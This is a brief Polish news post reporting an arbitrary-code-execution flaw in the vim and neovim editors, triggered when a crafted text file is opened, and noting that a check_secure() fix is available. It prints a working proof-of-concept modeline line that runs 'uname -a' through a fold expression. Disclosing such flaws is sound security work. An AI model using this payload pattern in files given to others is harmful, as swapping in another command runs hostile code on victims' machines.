Luka w vimie

W vimie edytora tekstu opublikowano lukę, która umożliwia wykonanie dowolnego kodu, gdy edytor otwiera plik tekstowy.

Oto tekst pliku wykonującego nieszkodliwą komendę uname -a

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("źródło! %"):fdl=0:fdt="

Poprawka w postaci dodanego wywołania check_secure() jest już dostępna w repozytoriach vim i neovim.

Źródło: linux.org.ru

Dodaj komentarz